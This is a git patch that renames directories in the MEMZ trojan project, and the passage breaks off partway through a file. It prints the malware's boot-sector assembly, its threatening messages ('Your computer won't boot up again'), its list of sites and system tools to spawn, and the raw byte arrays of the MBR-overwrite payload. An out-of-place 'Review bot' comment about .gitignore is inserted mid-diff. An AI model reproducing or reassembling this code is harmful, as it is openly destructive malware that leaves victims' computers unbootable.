From fac6767fd914087c50a5120838097730cb89d24a Mon Sep 17 00:00:00 2001 
From: Leurak Date: Sat, 29 Apr 2017 13:06:47 +0200 Subject: [PATCH] Renamed main directories --- .gitignore | 2 +- .../Data/Image/Frames/00.png | Bin .../Data/Image/Frames/01.png | Bin .../Data/Image/Frames/02.png | Bin .../Data/Image/Frames/03.png | Bin .../Data/Image/Frames/04.png | Bin .../Data/Image/Frames/05.png | Bin .../Data/Image/Frames/06.png | Bin .../Data/Image/Frames/07.png | Bin .../Data/Image/Frames/08.png | Bin .../Data/Image/Frames/09.png | Bin .../Data/Image/Frames/10.png | Bin .../Data/Image/Frames/11.png | Bin .../Data/Image/Special/01.png | Bin {PayloadMBR => NyanMBR}/Data/Image/png2bin.py | 0 {PayloadMBR => NyanMBR}/Data/Song/README.md | 0 {PayloadMBR => NyanMBR}/Data/Song/midi2bin.py | 0 {PayloadMBR => NyanMBR}/Makefile | 0 .../Source/Compressor/compress.c | 0 .../Source/Stage1/decompress.asm | 0 .../Source/Stage1/main.asm | 38 +- .../Stage2/Animation/Image/drawIntroFrame.asm | 0 .../Animation/Image/drawNormalFrame.asm | 0 .../Stage2/Animation/Image/initDrawing.asm | 0 .../Source/Stage2/Animation/countNyan.asm | 0 .../Source/Stage2/Animation/displayFrame.asm | 0 .../Source/Stage2/Animation/playNote.asm | 0 .../Stage2/Interrupts/keyboardHandler.asm | 0 .../Source/Stage2/Interrupts/timerHandler.asm | 0 .../Source/Stage2/Setup/setup.asm | 0 .../Source/Stage2/Setup/setupInterrupts.asm | 0 .../Source/Stage2/Setup/setupSpeaker.asm | 0 .../Source/Stage2/Setup/setupTimer.asm | 0 .../Source/Stage2/Utils/macros.asm | 0 .../Source/Stage2/Utils/timer.asm | 0 .../Source/Stage2/main.asm | 86 +- PayloadMBR/test.bat | 3 - {VCProject => WindowsTrojan}/MEMZ.sln | 0 .../MEMZ/MEMZ.vcxproj | 0 .../MEMZ/MEMZ.vcxproj.filters | 0 {VCProject => WindowsTrojan}/MEMZ/data.cpp | 600 +++++++------- {VCProject => WindowsTrojan}/MEMZ/data.h | 42 +- {VCProject => WindowsTrojan}/MEMZ/main.cpp | 756 +++++++++--------- {VCProject => WindowsTrojan}/MEMZ/memz.h | 128 +-- .../MEMZ/payloads.cpp | 598 +++++++------- {VCProject => WindowsTrojan}/MEMZ/payloads.h | 64 +- {VCProject => 
WindowsTrojan}/MEMZ/utils.cpp | 70 +- .../MEMZ/win32_crt_float.cpp | 0 48 files changed, 1192 insertions(+), 1195 deletions(-) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/00.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/01.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/02.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/03.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/04.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/05.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/06.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/07.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/08.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/09.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/10.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Frames/11.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/Special/01.png (100%) rename {PayloadMBR => NyanMBR}/Data/Image/png2bin.py (100%) rename {PayloadMBR => NyanMBR}/Data/Song/README.md (100%) rename {PayloadMBR => NyanMBR}/Data/Song/midi2bin.py (100%) rename {PayloadMBR => NyanMBR}/Makefile (100%) rename {PayloadMBR => NyanMBR}/Source/Compressor/compress.c (100%) rename {PayloadMBR => NyanMBR}/Source/Stage1/decompress.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage1/main.asm (96%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/drawIntroFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/drawNormalFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/Image/initDrawing.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/countNyan.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/displayFrame.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Animation/playNote.asm (100%) rename {PayloadMBR => NyanMBR}/Source/Stage2/Interrupts/keyboardHandler.asm (100%) rename {PayloadMBR => 
NyanMBR}/Source/Stage2/Interrupts/timerHandler.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setup.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupInterrupts.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupSpeaker.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Setup/setupTimer.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Utils/macros.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/Utils/timer.asm (100%)
rename {PayloadMBR => NyanMBR}/Source/Stage2/main.asm (96%)
delete mode 100644 PayloadMBR/test.bat
rename {VCProject => WindowsTrojan}/MEMZ.sln (100%)
rename {VCProject => WindowsTrojan}/MEMZ/MEMZ.vcxproj (100%)
rename {VCProject => WindowsTrojan}/MEMZ/MEMZ.vcxproj.filters (100%)
rename {VCProject => WindowsTrojan}/MEMZ/data.cpp (98%)
rename {VCProject => WindowsTrojan}/MEMZ/data.h (95%)
rename {VCProject => WindowsTrojan}/MEMZ/main.cpp (96%)
rename {VCProject => WindowsTrojan}/MEMZ/memz.h (96%)
rename {VCProject => WindowsTrojan}/MEMZ/payloads.cpp (96%)
rename {VCProject => WindowsTrojan}/MEMZ/payloads.h (96%)
rename {VCProject => WindowsTrojan}/MEMZ/utils.cpp (94%)
rename {VCProject => WindowsTrojan}/MEMZ/win32_crt_float.cpp (100%)
diff --git a/.gitignore b/.gitignore
index 980f810..c624664 100644
--- a/.gitignore
+++ b/.gitignore
@@ -243,6 +243,6 @@ _Pvt_Extensions
 *.mid
 *.bat
 *.zip
-/VCProject/MEMZ.VC.db
+*.db
 build/
 Build/
\ No newline at end of file
diff --git a/PayloadMBR/Data/Image/Frames/00.png b/NyanMBR/Data/Image/Frames/00.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/00.png
rename to NyanMBR/Data/Image/Frames/00.png
diff --git a/PayloadMBR/Data/Image/Frames/01.png b/NyanMBR/Data/Image/Frames/01.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/01.png
rename to NyanMBR/Data/Image/Frames/01.png
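Review bot: The replacement pattern `*.db` in the .gitignore hunk ignores every .db file anywhere in the tree, which is far broader than the single Visual Studio database `/VCProject/MEMZ.VC.db` it replaces; any intentional .db asset added later would be silently left out of commits without a warning. If the goal is only to keep ignoring the moved VS database, a narrower pattern such as `*.VC.db`, or the explicit new path under `WindowsTrojan/`, preserves the previous behaviour after the rename. The surrounding entries (`*.mid`, `*.bat`, `*.zip`) are already per-extension, so a `*.VC.db` entry would also match the file's existing style.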
diff --git a/PayloadMBR/Data/Image/Frames/02.png b/NyanMBR/Data/Image/Frames/02.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/02.png
rename to NyanMBR/Data/Image/Frames/02.png
diff --git a/PayloadMBR/Data/Image/Frames/03.png b/NyanMBR/Data/Image/Frames/03.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/03.png
rename to NyanMBR/Data/Image/Frames/03.png
diff --git a/PayloadMBR/Data/Image/Frames/04.png b/NyanMBR/Data/Image/Frames/04.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/04.png
rename to NyanMBR/Data/Image/Frames/04.png
diff --git a/PayloadMBR/Data/Image/Frames/05.png b/NyanMBR/Data/Image/Frames/05.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/05.png
rename to NyanMBR/Data/Image/Frames/05.png
diff --git a/PayloadMBR/Data/Image/Frames/06.png b/NyanMBR/Data/Image/Frames/06.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/06.png
rename to NyanMBR/Data/Image/Frames/06.png
diff --git a/PayloadMBR/Data/Image/Frames/07.png b/NyanMBR/Data/Image/Frames/07.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/07.png
rename to NyanMBR/Data/Image/Frames/07.png
diff --git a/PayloadMBR/Data/Image/Frames/08.png b/NyanMBR/Data/Image/Frames/08.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/08.png
rename to NyanMBR/Data/Image/Frames/08.png
diff --git a/PayloadMBR/Data/Image/Frames/09.png b/NyanMBR/Data/Image/Frames/09.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/09.png
rename to NyanMBR/Data/Image/Frames/09.png
diff --git a/PayloadMBR/Data/Image/Frames/10.png b/NyanMBR/Data/Image/Frames/10.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/10.png
rename to NyanMBR/Data/Image/Frames/10.png
diff --git a/PayloadMBR/Data/Image/Frames/11.png b/NyanMBR/Data/Image/Frames/11.png
similarity index 100%
rename from PayloadMBR/Data/Image/Frames/11.png
rename to NyanMBR/Data/Image/Frames/11.png
diff --git a/PayloadMBR/Data/Image/Special/01.png b/NyanMBR/Data/Image/Special/01.png
similarity index 100%
rename from PayloadMBR/Data/Image/Special/01.png
rename to NyanMBR/Data/Image/Special/01.png
diff --git a/PayloadMBR/Data/Image/png2bin.py b/NyanMBR/Data/Image/png2bin.py
similarity index 100%
rename from PayloadMBR/Data/Image/png2bin.py
rename to NyanMBR/Data/Image/png2bin.py
diff --git a/PayloadMBR/Data/Song/README.md b/NyanMBR/Data/Song/README.md
similarity index 100%
rename from PayloadMBR/Data/Song/README.md
rename to NyanMBR/Data/Song/README.md
diff --git a/PayloadMBR/Data/Song/midi2bin.py b/NyanMBR/Data/Song/midi2bin.py
similarity index 100%
rename from PayloadMBR/Data/Song/midi2bin.py
rename to NyanMBR/Data/Song/midi2bin.py
diff --git a/PayloadMBR/Makefile b/NyanMBR/Makefile
similarity index 100%
rename from PayloadMBR/Makefile
rename to NyanMBR/Makefile
diff --git a/PayloadMBR/Source/Compressor/compress.c b/NyanMBR/Source/Compressor/compress.c
similarity index 100%
rename from PayloadMBR/Source/Compressor/compress.c
rename to NyanMBR/Source/Compressor/compress.c
diff --git a/PayloadMBR/Source/Stage1/decompress.asm b/NyanMBR/Source/Stage1/decompress.asm
similarity index 100%
rename from PayloadMBR/Source/Stage1/decompress.asm
rename to NyanMBR/Source/Stage1/decompress.asm
diff --git a/PayloadMBR/Source/Stage1/main.asm b/NyanMBR/Source/Stage1/main.asm
similarity index 96%
rename from PayloadMBR/Source/Stage1/main.asm
rename to NyanMBR/Source/Stage1/main.asm
index 35e0d9f..c981993 100644
--- a/PayloadMBR/Source/Stage1/main.asm
+++ b/NyanMBR/Source/Stage1/main.asm
@@ -1,20 +1,20 @@
-use16
-org 0x7c00
-
-compressed: equ 0x7e00
-decompressed: equ 0x8E00
-
-%include "decompress.asm" ; Decompress Code & Data
-jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel
-
-; Boot sector signature
-times 510 - ($ - $$) db 0
-dw 0xAA55
-
-; Include the compressed data
-comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :(
-compsize: equ $-comp
-
-; Align it to sectors
-;align 512
+use16
+org 0x7c00
+
+compressed: equ 0x7e00
+decompressed: equ 0x8E00
+
+%include "decompress.asm" ; Decompress Code & Data
+jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel
+
+; Boot sector signature
+times 510 - ($ - $$) db 0
+dw 0xAA55
+
+; Include the compressed data
+comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :(
+compsize: equ $-comp
+
+; Align it to sectors
+;align 512
 times 4096 - ($ - $$) db 0
\ No newline at end of file
diff --git a/PayloadMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm b/NyanMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm
rename to NyanMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm
diff --git a/PayloadMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm b/NyanMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm
rename to NyanMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm
diff --git a/PayloadMBR/Source/Stage2/Animation/Image/initDrawing.asm b/NyanMBR/Source/Stage2/Animation/Image/initDrawing.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/Image/initDrawing.asm
rename to NyanMBR/Source/Stage2/Animation/Image/initDrawing.asm
diff --git a/PayloadMBR/Source/Stage2/Animation/countNyan.asm b/NyanMBR/Source/Stage2/Animation/countNyan.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/countNyan.asm
rename to NyanMBR/Source/Stage2/Animation/countNyan.asm
diff --git a/PayloadMBR/Source/Stage2/Animation/displayFrame.asm b/NyanMBR/Source/Stage2/Animation/displayFrame.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/displayFrame.asm
rename to NyanMBR/Source/Stage2/Animation/displayFrame.asm
diff --git a/PayloadMBR/Source/Stage2/Animation/playNote.asm b/NyanMBR/Source/Stage2/Animation/playNote.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Animation/playNote.asm
rename to NyanMBR/Source/Stage2/Animation/playNote.asm
diff --git a/PayloadMBR/Source/Stage2/Interrupts/keyboardHandler.asm b/NyanMBR/Source/Stage2/Interrupts/keyboardHandler.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Interrupts/keyboardHandler.asm
rename to NyanMBR/Source/Stage2/Interrupts/keyboardHandler.asm
diff --git a/PayloadMBR/Source/Stage2/Interrupts/timerHandler.asm b/NyanMBR/Source/Stage2/Interrupts/timerHandler.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Interrupts/timerHandler.asm
rename to NyanMBR/Source/Stage2/Interrupts/timerHandler.asm
diff --git a/PayloadMBR/Source/Stage2/Setup/setup.asm b/NyanMBR/Source/Stage2/Setup/setup.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Setup/setup.asm
rename to NyanMBR/Source/Stage2/Setup/setup.asm
diff --git a/PayloadMBR/Source/Stage2/Setup/setupInterrupts.asm b/NyanMBR/Source/Stage2/Setup/setupInterrupts.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Setup/setupInterrupts.asm
rename to NyanMBR/Source/Stage2/Setup/setupInterrupts.asm
diff --git a/PayloadMBR/Source/Stage2/Setup/setupSpeaker.asm b/NyanMBR/Source/Stage2/Setup/setupSpeaker.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Setup/setupSpeaker.asm
rename to NyanMBR/Source/Stage2/Setup/setupSpeaker.asm
diff --git a/PayloadMBR/Source/Stage2/Setup/setupTimer.asm b/NyanMBR/Source/Stage2/Setup/setupTimer.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Setup/setupTimer.asm
rename to NyanMBR/Source/Stage2/Setup/setupTimer.asm
diff --git a/PayloadMBR/Source/Stage2/Utils/macros.asm b/NyanMBR/Source/Stage2/Utils/macros.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Utils/macros.asm
rename to NyanMBR/Source/Stage2/Utils/macros.asm
diff --git a/PayloadMBR/Source/Stage2/Utils/timer.asm b/NyanMBR/Source/Stage2/Utils/timer.asm
similarity index 100%
rename from PayloadMBR/Source/Stage2/Utils/timer.asm
rename to NyanMBR/Source/Stage2/Utils/timer.asm
diff --git a/PayloadMBR/Source/Stage2/main.asm b/NyanMBR/Source/Stage2/main.asm
similarity index 96%
rename from PayloadMBR/Source/Stage2/main.asm
rename to NyanMBR/Source/Stage2/main.asm
index b1b66b8..1c1a118 100644
--- a/PayloadMBR/Source/Stage2/main.asm
+++ b/NyanMBR/Source/Stage2/main.asm
@@ -1,44 +1,44 @@
-; This is where the program starts after decompression
-
-use16
-org 0x8E00
-
-%include "Utils/macros.asm"
-%include "Setup/setup.asm"
-
-; Everything should be already set up, so the only
-; thing we need to do here is to wait for interrupts
-haltLoop:
- hlt
- jmp haltLoop
-
-; Include the interrupt handlers after the loop to
-; prevent them from triggering by including the code
-%include "Interrupts/timerHandler.asm"
-%include "Interrupts/keyboardHandler.asm"
-
-%include "Utils/timer.asm"
-
-%include "Animation/countNyan.asm"
-%include "Animation/displayFrame.asm"
-%include "Animation/playNote.asm"
-
-; ==============================
-; Variables
-; ==============================
-
-; ==============================
-; Data
-; ==============================
-
-frames: incbin "../../Build/frames.bin"
-framesLength: equ $-frames
-
-special: incbin "../../Build/special.bin"
-specialLength: equ $-special
-
-song: incbin "../../Build/song.bin"
-songLength: equ $-song
-
-message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..."
+; This is where the program starts after decompression
+
+use16
+org 0x8E00
+
+%include "Utils/macros.asm"
+%include "Setup/setup.asm"
+
+; Everything should be already set up, so the only
+; thing we need to do here is to wait for interrupts
+haltLoop:
+ hlt
+ jmp haltLoop
+
+; Include the interrupt handlers after the loop to
+; prevent them from triggering by including the code
+%include "Interrupts/timerHandler.asm"
+%include "Interrupts/keyboardHandler.asm"
+
+%include "Utils/timer.asm"
+
+%include "Animation/countNyan.asm"
+%include "Animation/displayFrame.asm"
+%include "Animation/playNote.asm"
+
+; ==============================
+; Variables
+; ==============================
+
+; ==============================
+; Data
+; ==============================
+
+frames: incbin "../../Build/frames.bin"
+framesLength: equ $-frames
+
+special: incbin "../../Build/special.bin"
+specialLength: equ $-special
+
+song: incbin "../../Build/song.bin"
+songLength: equ $-song
+
+message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..."
 messageLength: equ $-message
\ No newline at end of file
diff --git a/PayloadMBR/test.bat b/PayloadMBR/test.bat
deleted file mode 100644
index 5737c1b..0000000
--- a/PayloadMBR/test.bat
+++ /dev/null
@@ -1,3 +0,0 @@
-@echo off
-set PATH=%PATH%;C:\Program Files\qemu
-qemu-system-i386 -s -soundhw pcspk disk.img
\ No newline at end of file
diff --git a/VCProject/MEMZ.sln b/WindowsTrojan/MEMZ.sln
similarity index 100%
rename from VCProject/MEMZ.sln
rename to WindowsTrojan/MEMZ.sln
diff --git a/VCProject/MEMZ/MEMZ.vcxproj b/WindowsTrojan/MEMZ/MEMZ.vcxproj
similarity index 100%
rename from VCProject/MEMZ/MEMZ.vcxproj
rename to WindowsTrojan/MEMZ/MEMZ.vcxproj
diff --git a/VCProject/MEMZ/MEMZ.vcxproj.filters b/WindowsTrojan/MEMZ/MEMZ.vcxproj.filters
similarity index 100%
rename from VCProject/MEMZ/MEMZ.vcxproj.filters
rename to WindowsTrojan/MEMZ/MEMZ.vcxproj.filters
diff --git a/VCProject/MEMZ/data.cpp b/WindowsTrojan/MEMZ/data.cpp
similarity index 98%
rename from VCProject/MEMZ/data.cpp
rename to WindowsTrojan/MEMZ/data.cpp
index 8fd5dd5..e1105f8 100644
--- a/VCProject/MEMZ/data.cpp
+++ b/WindowsTrojan/MEMZ/data.cpp
@@ -1,301 +1,301 @@ -#include "data.h" - -#ifndef CLEAN -const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D"; -#endif - -const char *sites[] = { - "http://google.co.ck/search?q=best+way+to+kill+yourself", - "http://google.co.ck/search?q=how+2+remove+a+virus", - "http://google.co.ck/search?q=mcafee+vs+norton", - "http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend", - "http://google.co.ck/search?q=minecraft+hax+download+no+virus", - "http://google.co.ck/search?q=how+to+get+money", - "http://google.co.ck/search?q=bonzi+buddy+download+free", - "http://google.co.ck/search?q=how+2+buy+weed", - "http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic", - "http://google.co.ck/search?q=what+happens+if+you+delete+system32", - "http://google.co.ck/search?q=g3t+r3kt", - "http://google.co.ck/search?q=batch+virus+download", - "http://google.co.ck/search?q=virus.exe", - "http://google.co.ck/search?q=internet+explorer+is+the+best+browser", - "http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016", - "http://google.co.ck/search?q=virus+builder+legit+free+download", - "http://google.co.ck/search?q=how+to+create+your+own+ransomware", - "http://google.co.ck/search?q=how+to+remove+memz+trojan+virus", - "http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp", - "http://google.co.ck/search?q=dank+memz", - "http://google.co.ck/search?q=how+to+download+memz", - "http://google.co.ck/search?q=half+life+3+release+date", - "http://google.co.ck/search?q=is+illuminati+real", - "http://google.co.ck/search?q=montage+parody+making+program+2016", - "http://google.co.ck/search?q=the+memz+are+real", - "http://google.co.ck/search?q=stanky+danky+maymays", - 
"http://google.co.ck/search?q=john+cena+midi+legit+not+converted", - "http://google.co.ck/search?q=vinesauce+meme+collection", - "http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi", - "http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45", - "http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape", - "http://play.clubpenguin.com", - "http://pcoptimizerpro.com", - "http://softonic.com", - "calc", - "notepad", - "cmd", - "write", - "regedit", - "explorer", - "taskmgr", - "msconfig", - "mspaint", - "devmgmt.msc", - "control", - "mmc", -}; - -const size_t nSites = sizeof(sites) / sizeof(void *); - -#ifndef CLEAN -const char *msgs[] = { - "YOU KILLED MY TROJAN!\r\nNow you are going to die.", - "REST IN PISS, FOREVER MISS.", - "I WARNED YOU...", - "HAHA N00B L2P G3T R3KT", - "You failed at your 1337 h4x0r skillz.", - "YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!", - "HACKER!\r\nENJOY BAN!", - "GET BETTER HAX NEXT TIME xD", - "HAVE FUN TRYING TO RESTORE YOUR DATA :D", - "|\\/|3|\\/|2", - "BSOD INCOMING", - "VIRUS PRANK (GONE WRONG)", - "ENJOY THE NYAN CAT", - "Get dank antivirus m9!", - "You are an idiot!\r\nHA HA HA HA HA HA HA", - "#MakeMalwareGreatAgain", - "SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME", - "Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.", - "SecureBoot sucks.", - "gr8 m8 i r8 8/8", - "Have you tried turning it off and on again?", - "", - "Greetings to all GAiA members!", - "Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!", - "'This is everything I want in my computer'\r\n - danooct1 2016", - "'Uh, Club Penguin. 
Time to get banned!'\r\n - danooct1 2016", -}; - -const size_t nMsgs = sizeof(msgs) / sizeof(void *); -#endif - -const char *sounds[] = { - "SystemHand", - "SystemQuestion", - "SystemExclamation" -}; - -const size_t nSounds = sizeof(sounds) / sizeof(void *); - - -#ifndef CLEAN -// Split into 2 parts to save some space. - -const unsigned char code1[] = { - 0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02, - 0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3, - 0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81, - 0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00, - 0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75, - 0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2, - 0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, - 0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6, - 0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00, - 0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9, - 0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61, - 0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00, - 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04, - 0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56, - 0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, - 0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2, - 0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00, - 0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE, - 0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0, - 0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 0x74, 0x03, 0xE9, 0xEC, 0xFF, - 0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, - 0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D, - 0xFE, 0xCB, 
0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89, - 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED, - 0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40, - 0xE9, 0xC1, 0xFF -}; - -const unsigned char code2[] = { - 0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00, - 0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1, - 0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00, - 0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F, - 0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10, - 0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31, - 0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44, - 0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE, - 0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82, - 0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46, - 0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED, - 0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3, - 0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66, - 0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81, - 0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07, - 0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2, - 0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE, - 0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07, - 0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77, - 0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03, - 0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 0x03, 0xC8, - 0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 